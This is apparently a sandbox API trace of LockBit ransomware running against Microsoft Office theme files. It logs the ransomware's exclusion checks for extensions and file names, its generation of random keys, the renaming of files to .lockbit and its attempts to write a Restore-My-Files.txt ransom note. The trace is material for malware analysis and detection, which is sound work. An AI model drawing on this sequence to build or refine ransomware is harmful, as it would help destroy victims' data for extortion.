1 [0195.305] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.306] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.306] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.306] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.306] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.306] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.306] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx.lockbit") returned 91 [0195.306] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0195.307] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.307] malloc (_Size=0x40068) returned 0x3df0008 [0195.308] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=27789) returned 1 [0195.308] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.308] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.308] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.309] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.309] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.315] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.315] malloc (_Size=0xcc) returned 0x1fa2ed8 [0195.315] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xcc, FileInformationClass=0xa) returned 0xc0000008 [0195.315] free (_Block=0x1fa2ed8) [0195.315] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.315] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.315] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.315] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e861600, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c62e40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x2e861600, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x6c85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Solstice.eftx", cAlternateFileName="SOLSTI~1.EFT")) returned 1 [0195.316] lstrcmpiW (lpString1=".", lpString2="Solstice.eftx") returned -1 [0195.316] lstrcmpiW (lpString1="..", lpString2="Solstice.eftx") returned -1 [0195.316] PathFindExtensionW (pszPath="Solstice.eftx") returned=".eftx" [0195.316] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.316] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.316] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.316] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.316] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.316] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.316] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.316] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.316] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.316] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.316] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.317] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.317] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.317] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.317] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.317] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Solstice.eftx") returned -1 [0195.317] lstrcmpiW (lpString1="ntldr", lpString2="Solstice.eftx") returned -1 [0195.317] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Solstice.eftx") returned -1 [0195.318] lstrcmpiW (lpString1="bootsect.bak", lpString2="Solstice.eftx") returned -1 [0195.318] lstrcmpiW (lpString1="autorun.inf", lpString2="Solstice.eftx") returned -1 [0195.318] lstrcmpiW (lpString1="thumbs.db", lpString2="Solstice.eftx") returned 1 [0195.318] lstrcmpiW (lpString1="iconcache.db", lpString2="Solstice.eftx") returned -1 [0195.318] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.318] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned=".eftx" [0195.318] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.318] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.318] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.318] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.318] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.318] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.318] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.318] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.318] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.318] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.318] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.318] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.318] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.318] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.318] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.318] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.319] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.319] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.319] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.319] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.319] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.319] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.319] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.319] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.319] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.319] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.319] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.319] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.319] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx.lockbit") returned 89 [0195.319] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0195.321] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.321] malloc (_Size=0x40068) returned 0x3df0008 [0195.321] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=27781) returned 1 [0195.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.321] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.322] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.322] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.322] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.331] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.331] malloc (_Size=0xc8) returned 0x1fa2ed8 [0195.332] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc8, FileInformationClass=0xa) returned 0x0 [0195.333] free (_Block=0x1fa2ed8) [0195.333] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.333] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.333] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.333] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32199d00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c62e40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x32199d00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x5c8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Technic.eftx", cAlternateFileName="TECHNI~1.EFT")) returned 1 [0195.333] lstrcmpiW (lpString1=".", lpString2="Technic.eftx") returned -1 [0195.333] lstrcmpiW (lpString1="..", lpString2="Technic.eftx") returned -1 [0195.334] PathFindExtensionW (pszPath="Technic.eftx") returned=".eftx" [0195.334] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.334] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.334] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.334] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.334] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.334] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.334] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.334] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.334] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.334] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.334] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.334] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.335] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.335] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.335] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.335] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Technic.eftx") returned -1 [0195.335] lstrcmpiW (lpString1="ntldr", lpString2="Technic.eftx") returned -1 [0195.335] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Technic.eftx") returned -1 [0195.335] lstrcmpiW (lpString1="bootsect.bak", lpString2="Technic.eftx") returned -1 [0195.335] lstrcmpiW (lpString1="autorun.inf", lpString2="Technic.eftx") returned -1 [0195.336] lstrcmpiW (lpString1="thumbs.db", lpString2="Technic.eftx") returned 1 [0195.336] lstrcmpiW (lpString1="iconcache.db", lpString2="Technic.eftx") returned -1 [0195.336] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.336] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx") returned=".eftx" [0195.336] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.336] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.336] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.336] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.336] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.336] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.336] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.336] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.336] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.336] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.336] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.336] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.336] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.336] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.336] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.336] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.336] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.336] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.336] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.336] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.336] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.336] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.336] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.337] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.337] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.337] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.337] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.337] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.337] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx.lockbit") returned 88 [0195.337] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0195.338] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.338] malloc (_Size=0x40068) returned 0x3df0008 [0195.338] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=23692) returned 1 [0195.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.339] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.341] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.341] malloc (_Size=0xc6) returned 0x1fa2ed8 [0195.341] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0195.343] free (_Block=0x1fa2ed8) [0195.343] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.343] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.343] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.343] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bd2c400, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c88fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5bd2c400, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xa14f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Thatch.eftx", cAlternateFileName="THATCH~1.EFT")) returned 1 [0195.343] lstrcmpiW (lpString1=".", lpString2="Thatch.eftx") returned -1 [0195.343] lstrcmpiW (lpString1="..", lpString2="Thatch.eftx") returned -1 [0195.344] PathFindExtensionW (pszPath="Thatch.eftx") returned=".eftx" [0195.344] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.344] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.344] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.344] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.344] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.344] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.344] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.344] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.344] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.344] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.344] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.344] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.345] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 